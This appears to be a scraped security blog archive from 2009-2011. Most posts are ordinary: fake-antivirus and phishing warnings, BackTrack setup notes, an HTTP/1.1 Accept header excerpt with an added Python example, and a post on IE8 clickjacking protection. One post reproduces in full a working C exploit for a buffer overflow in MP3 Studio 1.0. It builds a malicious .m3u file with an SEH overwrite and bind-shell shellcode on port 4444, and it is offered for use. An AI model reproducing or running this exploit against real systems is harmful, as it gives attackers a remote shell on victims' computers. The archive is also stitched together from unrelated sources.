Fake Antivirus on Facebook  

Sunday, June 12, 2011

Fake antivirus is still targeting Facebook users: they are directed to a specific site and tricked into downloading a fake antivirus.

The bait is a post with an attention-grabbing subject such as “IMF boss Dominique Strauss-Kahn Exclusive Rape Videos – Black lady under attack!” or “oh shit, one more really Freaky video O_O”, plus many more trap links like them.
Some of the links lead to another site, Newtubes.in. Despite the Indian domain name, the site is not hosted in India; the server is located in Lithuania.

If you are offered streaming video under the YouTube name, we recommend checking the link you were given before you become a victim of internet fraudsters.

This time the fake antivirus does not only target Windows users; Apple’s Mac users are targeted as well.

Security researchers said that 16 hours into the attack the dangerous links had still not been blocked and kept spreading. The topic or subject line of the link has not changed, and it continues to appear on Facebook pages.

Be careful: one click is all it takes before a fake antivirus warning appears on your computer screen.
[ Thatcoin.com ]


Malware Attacking Windows 7  

Tuesday, May 17, 2011

Microsoft reported that malware attacks on Windows 7 rose 30% in 2010, while on Windows XP they fell 20%.
On 32-bit Windows 7, on average 4 of every 1000 computers were infected with malware, while the 64-bit version was lower at 2.5 per 1000 computers in 2010. Of the three Microsoft operating systems, only Windows XP saw a decrease in attacks.

The new report is derived from use of the Malicious Software Removal Tool (MSRT), which Microsoft provides free of charge to check computers for viruses, fake antivirus, trojans and other malware.

[ Thatcoin.com ]


Backtrack 5  

Thursday, April 14, 2011

BackTrack 5 will be based on Ubuntu Lucid (10.04 LTS), and will (finally) support both 32 bit and 64 bit architectures. We will be officially supporting KDE 4, Gnome and Fluxbox while providing users streamlined ISO downloads of each Desktop Environment (DE). Tool integration from our repositories will be seamless with all our supported DE’s, including the specific DE menu structure.
[ Thatcoin.com ]


Kaspersky Virus Removal Tool 2010  

Friday, April 8, 2011

The Kaspersky Virus Removal Tool application was designed to be another virus scanner and detection tool from Kaspersky. The product will scan the specified locations for any virus threats and remove them or send them to the Quarantine folder.

Kaspersky Virus Removal Tool 2010 is a utility designed to remove all types of threats from computers. Kaspersky Virus Removal Tool 2010 uses the effective detection algorithms realized in Kaspersky Anti-Virus and AVZ.

Kaspersky Virus Removal Tool 2010 does not provide resident protection for your computer. After disinfecting a computer, you are supposed to remove the tool and install a full version of antivirus software.


Advantages:

Simplified interface.
Can be installed to an infected computer (Safe Mode supported).
Composite scan and disinfection system: signature detection and heuristic analyzer.
Gathering system information and interactive creation of scripts for disinfection.

General functions:

Automatic and manual removal of virus, Trojans and worms.
Automatic and manual removal of Spyware and Adware modules.
Automatic and manual removal of all types of rootkits.
Kaspersky Virus Removal Tool 2010 is Freeware.


[Thatcoin.com]
Download support.kaspersky.com/viruses/avptool2010?level=2


Beware Virus Win32 Injector FBK  

Saturday, March 19, 2011

Once again the name of the courier company DHL International is being used by spammers from Poland.
The email subject and body, reproduced as sent:

Subject: Dear customer. DHL notification

The parcel was send your home address.
And it will of arrice Within 7 bussness day.
More information and the tracking number
are attached in the document below.
Thank you.
2011 DHL International GmbH. All rights reserverd.

The attached document.zip contains an exe file, DHL_notification.exe, which carries the virus Win32/Injector.FBK.Trojan.
[Thatcoin.com]


Beware Facebook Links contain with Malware  

Tuesday, February 8, 2011

Another attack is circulating: a message reading “hahahh” with a link. Do not click it.
The link leads to a page that smuggles in malware links, and displays a fake screen imitating another site with the message “Photo has been Moved.”

Clicking on the photo downloads the malware. If the downloaded program is executed, the browser is tampered with: it can no longer open Facebook and displays ads from the malware’s maker.


Delete and Restore Files  

Sunday, August 15, 2010

Besides restoring files deleted by mistake, FileWing can also delete files permanently. FileWing finds deleted files and displays them; as long as a file has not been overwritten, recovering it is no problem. FileWing can also remove data completely by overwriting it.
Tips
FileWing can also handle external drives, so it is suitable for rescuing deleted photos from digital cameras.

Using Facebook Tips  

Thursday, August 12, 2010

Facebook users are easy prey for criminals, given how many people share information. Every day people put themselves at risk by carelessly clicking on invitations sent by friends to join a group or to write on their walls.
Think about what you add.
Accepting a request from a new friend gives that person access to your posts, photos, messages and personal background information. Watch your friends list and reconsider who is entitled to access your personal things.
Check the privacy settings. Facebook recently updated them; setting your privacy again from scratch can make a real difference.

Consider your purpose in being on Facebook. Do you share photos? Stay in touch with other people? Share links and activity updates? Ask yourself what you want from a personal profile. That way you will publish less personal information.

Saving Password into DataInherit  

Wednesday, August 11, 2010

You can store as many as 50 passwords and some important documents in the DataInherit online service. The free service combines online storage and data privacy, allocating 10 MB of file storage. Another advantage: you can also access the account you created from an iPhone.

Bootable BT4 USB stick  

Friday, April 9, 2010

If you want to have Back Track 4 on USB with persistent changes and want to make it a bootable USB with Linux, just follow the instructions in the article How To: “Make bootable USB to save changes – Back Track 3 on USB with persistent changes“. The instructions are the same for BT4. (By the way, this post was written for my personal use with help I found somewhere online; I post it here to show my hardware compatibility.)
To make BT4 bootable with persistent changes I used 2 USB sticks: the first to launch Back Track (BT2, 3 or 4) without any changes, and the second to prepare and make all the changes in Linux for my Back Track 4. I used 2 USB sticks because it is easier.
When you finish Step 5 you will need to follow the instructions below:
Let’s say we have a formatted second partition. Mount it and create a changes directory in the root of its file system. Open a shell and execute these commands:
mount /dev/sdc2 /mnt/sdc2
cd /mnt/sdc2
mkdir changes
Don’t forget that it may be sdc2 rather than sdb2; it depends on your computer and configuration. If you use 2 USB sticks it should be sdc2. Next we will change how the system boots. Execute these commands:
cd /boot/syslinux
chmod +Xx lilo
chmod +Xx syslinux
Then you need to open syslinux.cfg and modify it. To do that execute the commands:
cd /mnt/sdc1/boot/syslinux
kwrite syslinux.cfg
I copied the boot definition I wanted to change and created a new entry, so I would have a fallback option if something became broken. In the file, find:
1. “LABEL BT4″
2. Copy this line and the next 3 lines, and paste all of them below the existing 4 lines. Now we have the same 4 lines twice; the second copy is our new section.
3. Change the “LABEL BT4″ to something you want, like “LABEL BT4-persistent”, and the description to something like “MENU LABEL BT4 Beta – Console – Persistent”.
4. Now we need to change the line that begins with APPEND in your copied section by adding “changes=/dev/sdx2″ immediately after “root=/dev/ram0 rw”, where x is the drive appropriate for your system. In my case it looks like this: “….root=/dev/ram0 rw changes=/dev/sdc2….”. Remember that you need to add “changes=/dev/sdx2″ after “rw” and remove the last word that follows “rw”. I think there should be “quiet” or something similar at the end of the line. Just delete this word.
5. Save your changes and exit the editor.
That should work fine now. Reboot and select the option you configured. To test it, create a file and reboot again. If your file is still there, everything is perfect. If you follow all the instructions step by step you won’t have any errors.
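The five editing steps above, as an added Python example that is not part of the original post: it rewrites a syslinux.cfg text the way steps 1 to 5 describe, keeping the original stanza as the fallback entry. It assumes the BT4 stanza is exactly four lines and takes the device name (sdc in the post) as a parameter.

```python
# Added example (not from the original post): perform steps 1-5 of the
# syslinux.cfg edit in code. Assumes the BT4 stanza is exactly four lines
# (LABEL, MENU LABEL, KERNEL, APPEND) and that the APPEND line contains
# "root=/dev/ram0 rw" followed by one word to drop (the post's "quiet").
import re

# Constructed sample in the BT4 layout; not copied from a real BT4 image.
SAMPLE_CFG = """DEFAULT BT4
PROMPT 1
LABEL BT4
  MENU LABEL BT4 Beta - Console
  KERNEL /boot/vmlinuz
  APPEND vga=0x317 initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw quiet
"""


def add_persistent_entry(cfg, device="sdc"):
    """Return cfg with a copy of the 'LABEL BT4' stanza appended that boots
    with persistent changes from /dev/<device>2. The original stanza is left
    in place as the fallback entry the post recommends keeping."""
    lines = cfg.splitlines()
    if "LABEL BT4" not in lines:
        raise ValueError("no 'LABEL BT4' stanza in syslinux.cfg")
    start = lines.index("LABEL BT4")                # step 1: find the stanza
    stanza = lines[start:start + 4]                 # step 2: LABEL + next 3 lines
    if len(stanza) < 4 or not stanza[3].lstrip().startswith("APPEND"):
        raise ValueError("unexpected stanza layout; refusing to edit")
    new = []
    for line in stanza:
        stripped = line.lstrip()
        indent = line[:len(line) - len(stripped)]
        if stripped == "LABEL BT4":                 # step 3: rename the copy
            line = "LABEL BT4-persistent"
        elif stripped.startswith("MENU LABEL"):
            line = indent + "MENU LABEL BT4 Beta - Console - Persistent"
        elif stripped.startswith("APPEND"):         # step 4: changes= after "rw"
            if "root=/dev/ram0 rw" not in line:
                raise ValueError("APPEND line lacks 'root=/dev/ram0 rw'")
            # insert changes=/dev/sdX2 after "rw" and drop the word that followed it
            line = re.sub(r"root=/dev/ram0 rw(?: \S+)?",
                          "root=/dev/ram0 rw changes=/dev/%s2" % device,
                          line, count=1)
        new.append(line)
    # step 5 is saving: the caller writes the returned text back to syslinux.cfg
    return cfg.rstrip("\n") + "\n\n" + "\n".join(new) + "\n"


if __name__ == "__main__":
    print(add_persistent_entry(SAMPLE_CFG, "sdc"))
```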


Using BT4 On VirtualBox  

Tuesday, March 16, 2010

Just some quick installation notes for those looking to install the recent VirtualBox release (3.0.4) on BackTrack 4. In case you don't know yet, BT4 is the top-rated Linux live distribution focused on penetration testing. The new Debian core (Ubuntu 8.10) makes BackTrack 4 easily extendable.

I'm a huge fan of Backtrack and use it as primary Operating System (HD Installation) on one of my laptops, currently studying for the Offensive Security course "Penetration Testing with BackTrack".

If you are looking for some pointers to get BT4 persistent changes without HD installation, @kriggins "Backtrack 4 USB persistent changes Nessus HowTo" is highly recommended.

Installation

Add the following line to your /etc/apt/sources.list:

deb http://download.virtualbox.org/virtualbox/debian intrepid non-free
Add the following key to your keyring (verify!):

# wget -q http://download.virtualbox.org/virtualbox/debian/sun_vbox.asc -O- | sudo apt-key add -
Update your package cache

# apt-get update
Install Virtualbox packages

# apt-get install virtualbox-3.0
Answer the prompt "Should the vboxdrv kernel module be compiled now?" with "Yes".

If it fails, have a look at /var/log/vbox-install.log and re-run /etc/init.d/vboxdrv setup after fixing the problem (usually missing header files, compiler, etc.)

Start it via "/usr/bin/VirtualBox" (case-sensitive!).
VirtualBox is now ready, have fun!

Note:
Thanks to dkms, the VirtualBox host kernel modules (vboxdrv, vboxnetflt and vboxnetadp) will be updated automatically if the Linux kernel version changes during the next apt-get upgrade.

source marsmenschen.com


HTTP Header 1.1  

Monday, March 1, 2010

Header Field Definitions
This section defines the syntax and semantics of all standard HTTP/1.1 header fields. For entity-header fields, both sender and recipient refer to either the client or the server, depending on who sends and who receives the entity.
Accept

The Accept request-header field can be used to specify certain media types which are acceptable for the response. Accept headers can be used to indicate that the request is specifically limited to a small set of desired types, as in the case of a request for an in-line image.

Accept           = "Accept" ":"
                   #( media-range [ accept-params ] )
media-range      = ( "*/*"
                   | ( type "/" "*" )
                   | ( type "/" subtype )
                   ) *( ";" parameter )
accept-params    = ";" "q" "=" qvalue *( accept-extension )
accept-extension = ";" token [ "=" ( token | quoted-string ) ]

The asterisk "*" character is used to group media types into ranges, with "*/*" indicating all media types and "type/*" indicating all subtypes of that type. The media-range MAY include media type parameters that are applicable to that range.
Each media-range MAY be followed by one or more accept-params, beginning with the "q" parameter for indicating a relative quality factor. The first "q" parameter (if any) separates the media-range parameter(s) from the accept-params. Quality factors allow the user or user agent to indicate the relative degree of preference for that media-range, using the qvalue scale from 0 to 1. The default value is q=1.

Note: Use of the "q" parameter name to separate media type
parameters from Accept extension parameters is due to historical
practice. Although this prevents any media type parameter named
"q" from being used with a media range, such an event is believed
to be unlikely given the lack of any "q" parameters in the IANA
media type registry and the rare usage of any media type
parameters in Accept. Future media types are discouraged from
registering any parameter named "q".

The example

Accept: audio/*; q=0.2, audio/basic

SHOULD be interpreted as "I prefer audio/basic, but send me any audio type if it is the best available after an 80% mark-down in quality."
If no Accept header field is present, then it is assumed that the client accepts all media types. If an Accept header field is present, and if the server cannot send a response which is acceptable according to the combined Accept field value, then the server SHOULD send a 406 (not acceptable) response.
A more elaborate example is

Accept: text/plain; q=0.5, text/html,
text/x-dvi; q=0.8, text/x-c

Verbally, this would be interpreted as "text/html and text/x-c are the preferred media types, but if they do not exist, then send the text/x-dvi entity, and if that does not exist, send the text/plain entity."
Media ranges can be overridden by more specific media ranges or specific media types. If more than one media range applies to a given type, the most specific reference has precedence. For example,

Accept: text/*, text/html, text/html;level=1, */*

have the following precedence:

1) text/html;level=1
2) text/html
3) text/*
4) */*

The media type quality factor associated with a given type is determined by finding the media range with the highest precedence which matches that type. For example,

Accept: text/*;q=0.3, text/html;q=0.7, text/html;level=1,
text/html;level=2;q=0.4, */*;q=0.5

would cause the following values to be associated:

text/html;level=1 = 1
text/html = 0.7
text/plain = 0.3
image/jpeg = 0.5
text/html;level=2 = 0.4
text/html;level=3 = 0.7

Note: A user agent might be provided with a default set of quality
values for certain media ranges. However, unless the user agent is
a closed system which cannot interact with other rendering agents,
this default set ought to be configurable by the user.
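The precedence and quality-factor rules above, worked through as an added Python example (not part of RFC 2616): the most specific matching media range decides the q value, a range that carries a parameter such as level=1 only matches a type carrying that parameter, and a zero result is the server's cue for a 406. The names parse_accept, quality and acceptable are the example's own; it also covers the no-Accept-header case, which the text says means "accept everything".

```python
# Added example, not RFC text: resolve the q value RFC 2616 section 14.1
# assigns to a concrete media type under a given Accept header.


def _split_params(s):
    """'text/html;level=1;q=0.4' -> ('text/html', {'level': '1'}, 0.4)."""
    parts = [p.strip() for p in s.split(";")]
    media_range, params, q = parts[0].lower(), {}, 1.0
    in_accept_params = False
    for p in parts[1:]:
        if "=" not in p:
            continue
        k, v = (x.strip() for x in p.split("=", 1))
        k = k.lower()
        if k == "q":                 # first "q" separates media params from accept-params
            in_accept_params = True
            try:
                q = max(0.0, min(1.0, float(v)))   # clamp malformed values into 0..1
            except ValueError:
                q = 0.0
        elif not in_accept_params:   # media type parameter, e.g. level=1
            params[k] = v
        # accept-extension parameters after "q" are ignored here
    return media_range, params, q


def parse_accept(header):
    """Return a list of (type, subtype, params, q) for an Accept field value."""
    ranges = []
    for item in header.split(","):
        item = item.strip()
        if not item:
            continue
        mr, params, q = _split_params(item)
        if "/" not in mr:
            continue                 # malformed media-range: skip it
        t, st = mr.split("/", 1)
        ranges.append((t, st, params, q))
    return ranges


def _specificity(rng, t, st, params):
    """Rank how specifically an Accept range matches a concrete media type;
    None means no match. Higher wins: */* < type/* < type/subtype < with params."""
    rt, rst, rparams, _ = rng
    if rt == "*" and rst == "*":
        return 0
    if rt == t and rst == "*":
        return 1
    if rt == t and rst == st:
        # a range with parameters only applies if the type carries them all
        if all(params.get(k) == v for k, v in rparams.items()):
            return 2 + len(rparams)
    return None


def quality(header, media_type):
    """q value for media_type (e.g. 'text/html;level=2') under the Accept header."""
    if header is None:
        return 1.0                   # no Accept header: the client accepts everything
    mr, params, _ = _split_params(media_type)
    if "/" not in mr:
        raise ValueError("media type must be type/subtype")
    t, st = mr.split("/", 1)
    best = None
    for rng in parse_accept(header):
        spec = _specificity(rng, t, st, params)
        if spec is not None and (best is None or spec > best[0]):
            best = (spec, rng[3])
    return 0.0 if best is None else best[1]   # nothing matched: not acceptable


def acceptable(header, media_type):
    """False means the server SHOULD answer 406 (Not Acceptable)."""
    return quality(header, media_type) > 0.0
```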


Intrusion Detection System Tutorial  

An intrusion detection system (IDS) is a device (or application) that monitors network and/or system activities for malicious activities or policy violations.
Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices. Intrusion prevention is the process of performing intrusion detection and attempting to stop detected possible incidents. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators. In addition, organizations use IDPSs for other purposes, such as identifying problems with security policies, documenting existing threats, and deterring individuals from violating security policies. IDPSs have become a necessary addition to the security infrastructure of nearly every organization.

IDPSs typically record information related to observed events, notify security administrators of important observed events, and produce reports. Many IDPSs can also respond to a detected threat by attempting to prevent it from succeeding. They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g., reconfiguring a firewall), or changing the attack’s content.


Haiti World Earthquake Virtual Worlds  

Sunday, February 14, 2010

Haiti was recently hit by a powerful earthquake, measuring 7 on the Richter scale. The impact of the earthquake is very sad, and the number of victims is anything but small: an estimated 75 thousand people are buried in rubble and about 200 thousand people were killed. Aid came from all over the world, and donations through the online world are emerging. It turns out that this has been exploited by online criminals.

Online criminals use email and fake websites designed to steal what should have been charitable donations. Symantec has seen online scams spreading with Haiti earthquake themes, including spam emails asking for donations and manipulated search results that can infect computers with malware.

Symantec’s security experts have called on computer users to follow smart practices for staying safe online, and to make sure that donations and assistance reach the disaster victims and not con men.

When contributing to a charity online, always remember:

Avoid clicking suspicious links in emails or IM messages; they may lead to a fake website. Symantec’s security experts recommend typing the web address, such as that of the charitable organization, directly into the browser instead of clicking the link in the message.

Never fill out a form in a message requesting personal or financial information or passwords. A reputable charitable organization will not ask for personal information via e-mail. If in doubt, contact the organization directly through a trusted independent channel, such as a phone number you have verified, or an Internet address that you type into a new browser window (do not click on, or cut and paste, the link in the message).


MP3 Studio 1.0 (.m3u File) Local Buffer Overflow Exploit  

/* mplode.c vs MP3 Studio v1.0
* Tested on: Windows 2000 SP4
*
* Author: Dominic Chell
*
* PoC: http://www.milw0rm.com/exploits/9277
* The PoC author said he could not exploit it so I decided to try.
*
* A bit of fun for a boring night in Peterborough :(
* Good luck finding someone who uses this media player.
*/

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define usage(){ (void)fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc \n\nExample: mplode.exe [output file]\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}

// bind shell lport = 4444
char shellcode[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf7"
"\x82\xf8\x80\x83\xeb\xfc\xe2\xf4\x0b\xe8\x13\xcd\x1f\x7b\x07\x7f"
"\x08\xe2\x73\xec\xd3\xa6\x73\xc5\xcb\x09\x84\x85\x8f\x83\x17\x0b"
"\xb8\x9a\x73\xdf\xd7\x83\x13\xc9\x7c\xb6\x73\x81\x19\xb3\x38\x19"
"\x5b\x06\x38\xf4\xf0\x43\x32\x8d\xf6\x40\x13\x74\xcc\xd6\xdc\xa8"
"\x82\x67\x73\xdf\xd3\x83\x13\xe6\x7c\x8e\xb3\x0b\xa8\x9e\xf9\x6b"
"\xf4\xae\x73\x09\x9b\xa6\xe4\xe1\x34\xb3\x23\xe4\x7c\xc1\xc8\x0b"
"\xb7\x8e\x73\xf0\xeb\x2f\x73\xc0\xff\xdc\x90\x0e\xb9\x8c\x14\xd0"
"\x08\x54\x9e\xd3\x91\xea\xcb\xb2\x9f\xf5\x8b\xb2\xa8\xd6\x07\x50"
"\x9f\x49\x15\x7c\xcc\xd2\x07\x56\xa8\x0b\x1d\xe6\x76\x6f\xf0\x82"
"\xa2\xe8\xfa\x7f\x27\xea\x21\x89\x02\x2f\xaf\x7f\x21\xd1\xab\xd3"
"\xa4\xd1\xbb\xd3\xb4\xd1\x07\x50\x91\xea\xe9\xdc\x91\xd1\x71\x61"
"\x62\xea\x5c\x9a\x87\x45\xaf\x7f\x21\xe8\xe8\xd1\xa2\x7d\x28\xe8"
"\x53\x2f\xd6\x69\xa0\x7d\x2e\xd3\xa2\x7d\x28\xe8\x12\xcb\x7e\xc9"
"\xa0\x7d\x2e\xd0\xa3\xd6\xad\x7f\x27\x11\x90\x67\x8e\x44\x81\xd7"
"\x08\x54\xad\x7f\x27\xe4\x92\xe4\x91\xea\x9b\xed\x7e\x67\x92\xd0"
"\xae\xab\x34\x09\x10\xe8\xbc\x09\x15\xb3\x38\x73\x5d\x7c\xba\xad"
"\x09\xc0\xd4\x13\x7a\xf8\xc0\x2b\x5c\x29\x90\xf2\x09\x31\xee\x7f"
"\x82\xc6\x07\x56\xac\xd5\xaa\xd1\xa6\xd3\x92\x81\xa6\xd3\xad\xd1"
"\x08\x52\x90\x2d\x2e\x87\x36\xd3\x08\x54\x92\x7f\x08\xb5\x07\x50"
"\x7c\xd5\x04\x03\x33\xe6\x07\x56\xa5\x7d\x28\xe8\x07\x08\xfc\xdf"
"\xa4\x7d\x2e\x7f\x27\x82\xf8\x80";

char *seh = "\xC4\x2A\x02\x75";
//ws2help.dll - 0x75022AC4 - pop/pop/ret
char *nextseh = "\xeb\x10\x90\x90";
// short jmp nop nop

int main(int argc, char *argv[])
{
    char outfile[20];
    if (argc < 2) { usage(); return 0; }
    if (strlen(argv[1]) < 15) {
        strncpy(outfile, argv[1], 14);
        outfile[14] = '\0';
    } else {
        strcpy(outfile, "mplode.m3u");
    }
    FILE *fp = fopen(outfile, "w");
    if (!fp) error("[*] Cannot output file\n");
    fwrite("http://", 7, 1, fp);
    for (int i = 0; i < 4103; i++) { fwrite("\x41", 1, 1, fp); }   // filler up to the SEH record
    fwrite(nextseh, 4, 1, fp);
    fwrite(seh, 4, 1, fp);
    for (int i = 0; i < 500; i++) { fwrite("\x90", 1, 1, fp); }    // nop sled
    fwrite(shellcode, sizeof(shellcode), 1, fp);
    fclose(fp);
    fprintf(stderr, "MPlode vs MP3 Studio v1.0\n(C) dmc \n\n");
    fprintf(stderr, "[*] Success, exploit written to %s\n", outfile);
    exit(0);
    return 0;
}

source milw0rm.com


Automated Vulnerability Detection System  

Friday, January 8, 2010

Automate Your Penetration Testing

AVDS is a network vulnerability assessment appliance for networks of 50 to 200,000 nodes. It performs an in-depth inspection for security weaknesses that can replace exhaustive penetration testing. With each scan it will automatically find new equipment and services and add them to the inspection schedule. It then tests every node based on its characteristics and records your system's responses.

In a matter of hours and with no network down time or interruption of services AVDS will generate detailed reports specifying network security weaknesses.

Our database of tests is updated daily with the most recently discovered security vulnerabilities. The AVDS database includes over 10,000 known vulnerabilities and the updates include discoveries by our own team and those discovered by corporate and private security teams around the world.

Simple, Fast and Comprehensive

Manual vulnerability assessment is expensive and infrequently done. Assessment software can be time consuming to set up and operate, plagued by high false positive rates and cause network resource issues.

Automated Testing Using AVDS:
• Gets your tactical security work done routinely and quickly
• Provides the fixes you and your staff need for fast mitigation
• Buys you time to focus on security strategy
• Automatically scans new equipment, ports and applications
• Scales to handle multiple networks, business units, countries
• Reduces your patch-work by identifying exactly what is needed.


Network Security Software  

Wednesday, January 6, 2010

Network security threats are one of the major concerns for all online businesses today. As soon as computer software was produced, hackers set about their task of destroying it. On networks the data matter even more than the software, because the data contain sensitive information. Hackers send their programs either to destroy databases or to steal data; both are equally dreaded by network administrators.


Protector Plus Antivirus Local Privilege Escalation Vulnerability  

ShineShadow Security Report 15092009-09

TITLE

Local privilege escalation vulnerability in Protector Plus antivirus software

BACKGROUND

Protector Plus range of antivirus products are known the world over for
their efficiency and reliability. Protector Plus Antivirus Software is
available for Windows Vista, Windows XP, Windows Me, Windows 2000,
Windows 98, Windows 2000/2003/NT server and NetWare platforms. Protector
Plus Antivirus Software is the ideal antivirus protection for your
computer against all types of malware like viruses, trojans, worms and
spyware.


Virus spreading via PDF  

Sunday, November 1, 2009

Virus writers have created an exploit for an unpatched vulnerability in Adobe Flash Player, Acrobat and Acrobat Reader. The vulnerability exists in these applications on all platforms: Windows, OS X, Linux and Solaris.

The vulnerable products are:

* Adobe Reader 9.1.2 and earlier 9.x versions
* Adobe Flash Player 9.0.159.0 and 10.0.22.87 and earlier 9.x and 10.x versions

You can read the alert from Adobe at: http://www.adobe.com/support/security/advisories/apsa09-03.html

The exploit runs with the privileges of the current user. The known virus is delivered as a PDF file which could be attached to an email or posted on a web page.

OIT has seen an instance of an infected computer sending email with .PDF attachments. The emails had a message saying the attachment was an e-card or an invoice for a recent purchase. Usual warnings apply, if you weren't expecting an email with an attachment, don't open the PDF attachment. If you don't know the sender, don't open the PDF attachment.

The malicious PDF contains Flash content. In the Windows environment, if the malicious PDF is opened with an Adobe product, it exploits the vulnerability via the Flash Player DLL called authplay.dll. On a Windows system it is apparently possible to break the connection between Acrobat and Flash by renaming that DLL and another one in the same directory called rt3d.dll. This is the only workaround at this time. There are alternative PDF viewers that would not be vulnerable.

According to malware analysts, the exploit will work on Windows 9x, NT, 2K, XP, Vista, Server 2000 and Server 2003.

Adobe is working on a patch and says it will be ready for all platforms except Solaris on 7/30/09. So until then, use caution when opening that PDF. If you receive a PDF that crashes Acrobat, I'd like to know.

source oit.ncsu.edu


IE8 Clickjacking Protection Exposed  

Yesterday I published a blind analysis of the so called “Clickjacking protection” included in IE8 RC1. “Blind” because, hype aside, there was no technical documentation available, even if the feature was targeted to web developers who — in order to protect their users — should modify the way their pages are served.

After a while, Microsoft’s David Ross sent me an email confirming that my wild guesses about IE8’s approach, its scope and its limitations were indeed correct. The only information obviously missing from my “prophetic” description was the real name of the “X-I-Do-Not-Want-To-Be-Framed-Across-Domains” HTTP header to be sent before the sensible pages, and today this little mystery has been finally unveiled by Eric Lawrence on the IE Blog:

Web developers can send a HTTP response header named X-FRAME-OPTIONS with HTML pages to restrict how the page may be framed. If the X-FRAME-OPTIONS value contains the token DENY, IE8 will prevent the page from rendering if it will be contained within a frame. If the value contains the token SAMEORIGIN, IE will block rendering only if the origin of the top level-browsing-context is different than the origin of the content containing the X-FRAME-OPTIONS directive. For instance, if http://shop.example.com/confirm.asp contains a DENY directive, that page will not render in a subframe, no matter where the parent frame is located. In contrast, if the X-FRAME-OPTIONS directive contains the SAMEORIGIN token, the page may be framed by any page from the exact http://shop.example.com origin.

As I had anticipated, IE8’s “clickjacking protection” is just an alternate scriptless way to perform frame busting, a well known and simple technique to prevent a page from being “framed” in another page and therefore becoming an easy UI Redressing target. Microsoft had to follow its own special path because the traditional JavaScript implementation can be easily circumvented on IE, e.g. by loading the targeted page inside an IFRAME SECURITY=restricted element. But the other major browsers are equally “protected” (if we can call “browser protection” something relying on the good will and education of web authors) by “standard” frame busting. Therefore, slogans like “the first browser to counter this type of threat” (James Pratt, Microsoft senior product manager) were marketspeak at its best. Furthermore, this approach is useless against Clickjacking in its original “historical” meaning, i.e. those attacks involving Flash applets and other kinds of plugin embeddings which led Robert “RSnake” Hansen and Jeremiah Grossman to invent the successful buzzword.
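The DENY and SAMEORIGIN rules quoted above, as an added Python example that is neither IE8's nor NoScript's code: the point it makes concrete is that SAMEORIGIN compares the origin (scheme, host, port) of the top-level browsing context with that of the framed content, not the immediate parent frame. The names origin and should_render are the example's own, and treating the header value as a comma-separated token list with DENY winning over SAMEORIGIN is an assumption.

```python
# Added example (not from the post or the IE Blog): the rendering decision
# IE8 makes from X-FRAME-OPTIONS, as described in the quoted paragraph.
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """(scheme, host, port) triple used for the SAMEORIGIN comparison;
    a missing port is filled in from the scheme's default."""
    u = urlsplit(url)
    scheme = u.scheme.lower()
    port = u.port if u.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, (u.hostname or "").lower(), port)


def should_render(xfo_value, content_url, top_url=None):
    """True if a page served from content_url with 'X-FRAME-OPTIONS: xfo_value'
    is allowed to render. top_url is the URL of the top-level browsing
    context (not the direct parent frame); None means the page is itself
    the top-level document and therefore not framed at all."""
    # assumption: tokens may be comma-separated; matching is case-insensitive
    tokens = [t.strip().upper() for t in (xfo_value or "").split(",") if t.strip()]
    if top_url is None or not tokens:
        return True                    # not framed, or no directive: render
    if "DENY" in tokens:
        return False                   # framed anywhere at all: block
    if "SAMEORIGIN" in tokens:
        return origin(content_url) == origin(top_url)
    return True                        # unknown token: header has no effect


if __name__ == "__main__":
    # constructed URLs (example.com / example.org are reserved names)
    page = "http://shop.example.com/confirm.asp"
    print(should_render("DENY", page, "http://shop.example.com/"))          # False
    print(should_render("SAMEORIGIN", page, "http://shop.example.com/"))    # True
    print(should_render("SAMEORIGIN", page, "http://other.example.org/"))   # False
```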

However in my post I had also written that having such a scriptless alternative as a cross-browser option would be nice:

I do believe that a declarative approach to control subdocument requests is an excellent idea: otherwise I wouldn’t have included the SUB pseudo-method in ABE Rules Specification (pdf). Moreover, as soon as I’ve got some less blurry info (David Ross, I know you’re listening, why don’t you drop me a line?), I’ll be happy to immediately implement a compatible feature in NoScript and lobby Mozilla for inclusion in Firefox 3.1.

David kindly answered

I think this would be fantastic and it’s a great place to start building some bridges.

I agree, in fact I’ve filed an enhancement request for Firefox, and I’m already working to release a NoScript development build featuring X-FRAME-OPTIONS support: that’s relatively easy, since I can hook in the work I’m already doing for the ABE module. (Update 2009-29-01: I just released NoScript 1.8.9.9 development build, featuring full experimental X-FRAME-OPTIONS compatibility support).
It’s worth noticing, though, that this is just a cross-browser compatibility effort: neither Firefox nor NoScript really need this feature. Traditional JavaScript-based frame busting works fine in Firefox, giving it the same degree of (modest) “protection” as IE8. NoScript users, on the other hand, are already fully protected, because ClearClick is the one and only countermeasure which works against any type of Clickjacking (frame or embed based), no matter if web sites cooperate or not.

Speaking of NoScript, I’ve got a small but important correction to the otherwise excellent article Robert McMillan wrote for PC World (IDG News) yesterday:

Because clickjacking requires scripting, the attack doesn’t work when NoScript is enabled.

This statement is wrong twice:

1. Clickjacking does not require scripting: JavaScript might make the attacker’s life easier, but it’s not indispensable to throw an attack.
2. NoScript does not need scripting to be disabled in order to protect its users against Clickjacking: its exclusive ClearClick anti-Clickjacking technology works independently from script blocking.

That’s why NoScript can be recommended to anyone, even to grandma who’s not inclined to block JavaScript: albeit I do not encourage using NoScript’s “Allow Scripts Globally” command because the default deny policy is your best first-line defense, many additional protection features such as Anti-XSS filters and ClearClick still remain active even when JavaScript is enabled, providing the safest web experience available in any browser.

source hackademix.net

